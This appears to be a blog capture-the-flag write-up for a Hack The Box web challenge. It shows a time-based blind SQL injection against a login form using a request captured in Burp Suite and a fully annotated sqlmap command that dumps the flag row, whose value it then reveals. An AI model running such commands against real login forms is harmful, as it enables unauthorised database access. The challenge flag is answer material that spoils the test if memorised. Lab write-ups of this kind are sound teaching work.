Challenge Files - Local Docker Webserver: web_toy_management.zip
Exploit Technique Used: Time-Based Blind SQL Injection with sqlmap
Details:
Upon connecting to the website, we're immediately greeted by a login portal, which is excellent because we normally have to enumerate to find such a portal:
cat web_toy_management/challenge/database.sql-- Database: `toydb`INSERT INTO `toylist` (`id`, `toy`, `receiver`, `location`, `approved`) VALUES(1, 'She-Ra, Princess of Power', 'Elaina Love', 'Houston', 1),(2, 'Bayblade Burst Evolution', 'Jarrett Pace', 'Dallas', 1),(3, 'Barbie Dreamhouse Playset', 'Kristin Vang', 'Austin', 1),(4, 'StarWars Action Figures', 'Jaslyn Huerta', 'Amarillo', 1),(5, 'Hot Wheels: Volkswagen Beach Bomb', 'Eric Cameron', 'San Antonio', 1),(6, 'Polly Pocket dolls', 'Aracely Monroe', 'El Paso', 1),(7, 'HTB{f4k3_fl4g_f0r_t3st1ng}', 'HTBer', 'HTBland', 0);
It seems we get the flag if we can somehow query this database/table. I decided to use sqlmap to see if it can get us anything valuable. I loaded up Burp Suite to capture a legitimate POST request and copy+pasted it to a file called "post.txt" to feed into sqlmap:
IT FOUND SOMETHING! sqlmap discovered the username field is vulnerable to a time-based blind SQL injection attack. Since I already knew the database and table name, I went ahead and queried for it directly with sqlmap:
sqlmap -r post.txt --batch -D toydb -T toylist -C toy -where "id=7" --dump
# -r feeds in the post request I pasted into post.txt
# --batch runs the sqlmap tool and automatically says "yes" to all questions so it doesn't pause
# -D is the database name we want to query
# -T is the table name we want to query
# -C is the column name of the table we want to query
# -where "id=7" tells sqlmap to dump exactly the row where the "id" field is 7 (the flag)
# --dump tells it to do the SQL query and show us the results of the query
VOILA! THE FLAG!
HTB{1nj3cti0n_1s_in3v1t4bl3}
No comments:
Post a Comment